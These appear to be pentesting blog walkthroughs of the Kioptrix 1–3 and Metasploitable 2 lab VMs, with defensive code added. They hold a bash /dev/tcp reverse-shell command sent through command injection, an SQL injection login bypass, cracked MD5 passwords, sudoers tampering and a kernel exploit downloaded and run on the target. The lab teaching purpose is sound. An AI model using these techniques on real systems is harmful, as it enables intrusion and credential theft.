[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600

whoami
www-data

So we have a shell. Lets do some looking around.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting. Lets see what’s in there.

ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

I snooped around until I found what we were looking for in gconfig.php: the MySQL root credentials, which also work for the phpMyAdmin login!

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I entered the credentials into phpMyAdmin, selected the gallery database, clicked the SQL tab and ran the query below.

SELECT * FROM dev_accounts


We now have the usernames and password hashes for dreg and loneferret!

Password Cracking using hashcat

With the two hashes stored in hashes.txt, I started hashcat to crack them. Both are 32 hex characters with no salt, which fits raw MD5, so I used hash mode 0 (-m 0) with the rockyou wordlist:

root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

We found that passwords were starwars and Mast3r!
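The following is an added example, not part of the write-up, showing what hashcat -m 0 is doing under the hood: guess the hash type from its shape, then hash every wordlist candidate once and look it up against all targets at the same time. The two hashes are the ones dumped from dev_accounts above; the wordlist is a constructed stand-in for rockyou.txt.

```python
import hashlib

# The two hashes from the dev_accounts dump in the write-up, and a small
# constructed wordlist standing in for rockyou.txt.
DUMPED_HASHES = ["5badcaf789d3d1d09794d8f021f40f0e", "0d3eccfb887aabd50f243b3f155c0f85"]
WORDLIST = ["123456", "password", "letmein", "starwars", "Mast3r", "qwerty"]


def guess_hashcat_modes(h):
    """Candidate hashcat -m values from the hash's shape alone.
    32 unsalted hex chars is raw MD5 (0), but NTLM (1000) and MD4 (900) look the same."""
    if h.startswith("$1$"):
        return [500]            # md5crypt
    if h.startswith("$6$"):
        return [1800]           # sha512crypt
    if h.startswith("$2"):
        return [3200]           # bcrypt
    if all(c in "0123456789abcdef" for c in h.lower()):
        return {32: [0, 1000, 900], 40: [100], 64: [1400]}.get(len(h), [])
    return []


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def dictionary_attack(hashes, wordlist):
    """Hash each candidate once and check it against every target.
    With unsalted hashes one MD5 computation per word tests all users at once,
    which is why a dump like this falls in seconds."""
    targets = {h.lower() for h in hashes}
    cracked = {}
    for word in wordlist:
        digest = md5_hex(word)
        if digest in targets:
            cracked[digest] = word
            if len(cracked) == len(targets):
                break
    return cracked


if __name__ == "__main__":
    for h in DUMPED_HASHES:
        print(h, "candidate modes:", guess_hashcat_modes(h))
    print(dictionary_attack(DUMPED_HASHES, WORDLIST))
```

A per-user salt would defeat the shared lookup (each word would have to be hashed once per user), and a slow scheme such as sha512crypt or bcrypt would make each of those hashes expensive; plain MD5 offers neither protection.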

Persistence (Linux Privilege Escalation)

Lets ssh into the victim’s VM using the loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ 

Lets check the CompanyPolicy.README file; that looks interesting! I also ran sudo -l and whereis ht for some additional info.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 

Two things stand out: ht is setuid root (the s bits in -rwsr-sr-x), and loneferret may also run it through sudo without a password. Either way the editor opens files as root, so as loneferret I can edit any file on the box, including /etc/sudoers, and the !/usr/bin/su negation does nothing to prevent that. Run the command below to start ht, then press F3 and open /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Once in /etc/sudoers, add , /bin/sh to the end of the loneferret entry, so that /bin/sh joins /usr/local/bin/ht in the list of commands loneferret may run as root without a password. Then open the File menu with ALT+F to save, and press CTRL+Z to exit. One caveat: this bypasses visudo's syntax check, and a malformed sudoers file breaks sudo for every user on the box, so touch only that one line.

Now run sudo /bin/sh for root access:

loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
Kioptrix3
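The following is an added example, not part of the write-up, for the defensive side of the step above: a small audit over sudo -l output that flags the pattern exploited here (a file editor runnable as root, NOPASSWD, and a '!' deny rule that does not actually deny anything). The input is a constructed copy of the sudo -l output shown earlier; the lists of file-writing and shell-spawning programs are short assumptions of my own, not an exhaustive catalogue.

```python
import re

# Constructed copy of the sudo -l output from the write-up.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that, run as root, can rewrite arbitrary files (editors, copy
# tools) or hand back a shell. Constructed short lists for the example;
# GTFOBins is the fuller reference.
FILE_WRITERS = {"ht", "vi", "vim", "nano", "ed", "emacs", "tee", "cp", "dd"}
SHELL_SPAWNERS = {"sh", "bash", "dash", "su", "find", "awk", "perl", "python", "less", "more", "man"}

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Turn sudo -l lines into rule dicts; header lines that do not match are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),   # "(root)" or "(root : root)"
            "tags": [t for t in re.split(r":\s*", m.group("tags")) if t],
            "negated": cmd.startswith("!"),
            "path": cmd.lstrip("!").split()[0],
        })
    return rules


def audit(rules):
    """Human-readable findings for the risky patterns in a rule set."""
    findings = []
    for r in rules:
        prog = r["path"].rsplit("/", 1)[-1]
        where = "%s (as %s)" % (r["path"], r["runas"])
        if r["negated"]:
            findings.append(where + ": '!' entries are a deny-list; any other permitted "
                            "command that edits files or spawns a shell bypasses them")
            continue
        if r["runas"] in ("root", "ALL"):
            if prog in FILE_WRITERS:
                findings.append(where + ": editor runs as root and can rewrite /etc/sudoers or /etc/passwd")
            if prog in SHELL_SPAWNERS:
                findings.append(where + ": program can spawn a root shell")
        if "NOPASSWD" in r["tags"]:
            findings.append(where + ": NOPASSWD, so a hijacked session escalates without the user's password")
    return findings


def gives_root(rules):
    """True if any positive rule runs a file-writer or shell-spawner as root."""
    return any(not r["negated"] and r["runas"] in ("root", "ALL")
               and r["path"].rsplit("/", 1)[-1] in FILE_WRITERS | SHELL_SPAWNERS
               for r in rules)


if __name__ == "__main__":
    parsed = parse_sudo_l(SUDO_L_OUTPUT)
    for finding in audit(parsed):
        print("-", finding)
    print("root reachable:", gives_root(parsed))
```

Run against the write-up's output the audit reports the ht rule as a root file-write primitive, which is exactly the path taken above; the remediation is to drop the editor from sudoers (or confine it with sudoedit), not to add more '!' entries.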

Conclusion

This was hard compared to the first two and took me a while to get root access. It took some basic SQL knowledge as well as some basic Linux privilege escalation techniques, but I got it done. If you have any feedback you want to give, leave a comment below. Well, it just gets harder from here. On to the next one!

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:
“These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Lets get started!

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on ports 80/tcp and 443/tcp, rpcbind on port 111/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. A web server sitting next to a MySQL instance suggests the web application talks to a database, which makes SQL injection worth testing. Two legacy weaknesses also stand out in the scan: SSH still accepts protocol 1, and Apache still offers SSLv2 with export-grade ciphers.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I tried an SQL injection.

I tested the login form using ' or '1'='1 and it worked.

The reason it worked is that the login query is probably built by string concatenation, along the lines of:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying ' or '1'='1 as both the username and the password turns it into:

 SELECT * FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because AND binds tighter than OR, this reads as username='' OR ('1'='1' AND password='') OR '1'='1', and the trailing '1'='1' is always true, so every row in the table matches. The application sees a non-empty result and logs us in as whichever user comes back first.
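To make the bypass concrete, here is an added example (not code from the original post or from the Kioptrix application) that reproduces the string-built query against an in-memory SQLite table and puts the parameterised version beside it. The user rows and passwords are constructed sample data.

```python
"""The login bypass explained above, reproduced against an in-memory SQLite table."""
import sqlite3


def make_db():
    """Constructed sample data: admin is inserted first, so the bypass returns it."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("john", "pass123")])
    return db


def vulnerable_login(db, username, password):
    """String-built query: the attacker's quotes become part of the SQL grammar.

    Returns the username of the first matching row, or None.
    """
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Parameterised query: the same input is compared as a literal string value."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable:", vulnerable_login(db, payload, payload))  # admin
    print("safe:      ", safe_login(db, payload, payload))        # None
```

Note that the payload only needs to land in one of the two fields: with a real username and the payload as the password, the trailing or '1'='1' still makes the WHERE clause true for every row.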

After logging in we land on a page that pings a host, which is a classic candidate for command injection. Submitting ; id confirmed that the input was passed straight to a shell. I then tried to read credentials: /etc/passwd was readable, but /etc/shadow was not (the web server runs as apache, not root).

Knowing that the application is vulnerable to command injection, I took it a step further and went for a reverse shell.
I set up a netcat listener on port 443 to catch it:

root@kali:~# nc -nvlp 443

Then went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1
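The ping form fails because user input is pasted into a command line that a shell then re-parses. As an added example (my code, not the Kioptrix application's), the Python below shows that injectable pattern next to a hardened version that validates the target against an allowlist and runs ping as an argv list with no shell. The hostname grammar and the tainted sample input are assumptions for the example.

```python
"""Vulnerable and hardened versions of a 'ping a host' feature."""
import ipaddress
import re
import subprocess

# RFC 1123 hostname labels; an assumption for this example's allowlist.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def vulnerable_ping_command(target):
    """The injectable pattern: user input glued onto a command string.

    Returns the string that would be handed to a shell (shell_exec in PHP,
    subprocess.run(..., shell=True) in Python). The shell re-parses it.
    """
    return "ping -c 3 " + target


def shell_commands(command_line):
    """Show how a POSIX shell splits the line at ';' into separate commands.

    Simplified on purpose: real shells also honour &&, ||, |, backticks and $().
    """
    return [part.strip() for part in command_line.split(";") if part.strip()]


def validate_target(target):
    """Allowlist: the target must be an IP literal or a well-formed hostname."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("refusing target %r" % target)


def safe_ping_argv(target):
    """Argv form: the target is a single argument to ping and is never shell-parsed."""
    return ["ping", "-c", "3", validate_target(target)]


def safe_ping(target):
    """Run ping without a shell; bad input raises ValueError before anything executes."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, check=False)


if __name__ == "__main__":
    tainted = "192.168.182.147; id"  # constructed attacker input
    print(shell_commands(vulnerable_ping_command(tainted)))
    try:
        safe_ping_argv(tainted)
    except ValueError as err:
        print(err)
```

The allowlist also rejects values starting with "-", so a target cannot smuggle extra options into ping even though it is passed as its own argument.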


I got a reverse shell as the apache user. Next comes privilege escalation to root.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

The server is running CentOS 4.5 with kernel 2.6.9-55.EL. After some research I found that this kernel is vulnerable to the 'ip_append_data()' Ring0 privilege escalation exploit (Exploit-DB 9542, used below).

On the shell we just obtained, I used wget on the target itself to download the exploit from Exploit-DB. The --no-check-certificate flag is needed because the old CentOS CA bundle cannot validate the site's certificate (note the warnings); on a real engagement you would fetch and review the exploit on your own machine first, then transfer it.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I renamed the download with a .c extension, compiled it with gcc (available on the target), and ran it to get the root shell.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.

Description from the author:
“These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Without further ado, lets get started.

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using netdiscover I found the victim at 192.168.182.151

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 with mod_ssl 2.8.4 and OpenSSL 0.9.6b on ports 80 and 443 (TRACE enabled and SSLv2 still offered), Samba smbd on port 139, and rpcbind on port 111.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

I also ran nbtscan to collect NetBIOS information.

A quick SMB enumeration with enum4linux showed the victim is running Samba 2.2.1a, which is vulnerable to the Samba trans2open overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability, taken from Rapid7's Vulnerability & Exploit Database, is listed below. I used the Metasploit module exploit/linux/samba/trans2open to exploit it.

Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting a root shell I found the flag in /var/spool/mail, which said:
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”

Well, that's it for level 1. It only gets harder from here. Next is Level 2.

Metasploitable is a virtual machine built to be vulnerable so you can try out penetration testing tools and common techniques against it. I will go through the five phases of a penetration test (except reconnaissance) and talk about some of the tools and types of exploits I used. Metasploitable 2 has many more vulnerabilities; I will only cover a few, which should give you a good start on exploiting it. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

 192.168.182.147 

Metasploitable 2

 192.168.182.150 

Scanning and Enumeration

Scanning with nmap

A full-port version scan with OS detection (-sV -O -p1-65535) lists every open service and the version it is running; nmap also fingerprints the OS as Linux 2.6.X.

root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST
Nmap scan report for 192.168.182.150
Host is up (0.012s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37131/tcp open  nlockmgr    1-4 (RPC #100021)
38108/tcp open  unknown
53107/tcp open  mountd      1-3 (RPC #100005)
54247/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:13:C8:C2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Banner grabbing (port 23)

This was very interesting! I was able to find working credentials (msfadmin/msfadmin) just from a simple banner grab using telnet.

root@kali:~# telnet 192.168.182.150
